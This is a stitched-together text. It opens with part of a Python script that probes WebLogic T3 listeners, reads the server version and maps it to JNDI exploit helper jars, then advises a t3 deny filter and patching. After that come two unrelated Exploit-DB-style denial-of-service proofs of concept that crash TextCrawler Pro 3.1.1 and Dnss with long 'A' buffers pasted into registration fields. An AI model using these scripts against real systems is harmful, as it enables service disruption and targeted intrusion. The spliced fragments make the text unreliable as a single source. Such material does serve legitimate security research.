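T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\n\n"

# Constructed samples: what a T3 listener answers, and what a plain HTTP
# port answers to the same bytes. The version number is made up.
SAMPLE_T3_REPLY = b"HELO:10.3.6.0.false\nAS:2048\nHL:19\n\n"
SAMPLE_HTTP_REPLY = b"HTTP/1.1 400 Bad Request\r\n\r\n"

# Which helper jar the write-up above uses for which server version.
JNDI_JAR_FOR = {
    "12.2.1.3": "weblogic-spring-jndi-12.2.1.3.jar",
    "10.3.6.0": "weblogic-spring-jndi-10.3.6.0.jar",
    "12.2.1.0": "weblogic-spring-jndi-10.3.6.0.jar",
    "12.1.3.0": "weblogic-spring-jndi-10.3.6.0.jar",
    "12.2.1.1": "weblogic-spring-jndi-10.3.6.0.jar",
}


def parse_t3_reply(data):
    """Return the WebLogic version announced in a T3 HELO (normalised to four
    components, e.g. 12.2.1.3.0 -> 12.2.1.3), or None when the peer did not
    answer in T3 (port closed to T3, filtered, or plain HTTP)."""
    m = re.match(rb"HELO:(\d+(?:\.\d+)+)\.(true|false)", data)
    if not m:
        return None
    parts = m.group(1).decode().split(".")
    return ".".join(parts[:4])


def triage(reply):
    """Map a raw reply to (t3_exposed, version, jar_from_writeup_or_None)."""
    version = parse_t3_reply(reply)
    if version is None:
        return (False, None, None)
    return (True, version, JNDI_JAR_FOR.get(version))


def probe_t3(host, port=7001, timeout=5.0):
    """Live check against a real listener; not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(T3_HELLO)
        return triage(s.recv(1024))


if __name__ == "__main__":
    print("constructed T3 reply  :", triage(SAMPLE_T3_REPLY))
    print("constructed HTTP reply:", triage(SAMPLE_HTTP_REPLY))
```

A `(False, None, None)` result after the fix is the evidence that T3 is really off on that listener. The documented WebLogic way to get there (not described in the write-up) is a connection filter, `weblogic.security.net.ConnectionFilterImpl`, with a rule such as `0.0.0.0/0 * * deny t3 t3s` under Domain > Security > Filter; patching to the October 2018 CPU is still required, because the same port keeps serving HTTP and the deserialization path is fixed only by the patch.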
-
TextCrawler Pro3.1.1 - Denial of Service (PoC)
# Exploit Title: TextCrawler Pro 3.1.1 - Denial of Service (PoC)
# Date: 2020-05-01
# Vendor Homepage: https://www.digitalvolcano.co.uk/index.html
# Software Link: https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
# Exploit Author: Achilles
# Tested Version: 3.1.1
# Tested on: Windows 7 x64

# 1.- Run python code: TextCrawler.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open TextCrawler Pro
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
# 5.- Click 'Activate' and you will see a crash.

#!/usr/bin/env python
buffer = "\x41" * 6000
try:
    f = open("EVIL.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created")
-
Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1. Download and install Dnss
2. Run the python script, which will create a file (poc.txt)
3. Run the software: "Register -> Enter Registration Code"
4. Copy the characters in the file (poc.txt)
5. Paste the characters in the field 'Name' and click on 'Ok'
6. Dnss crashes
'''

#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")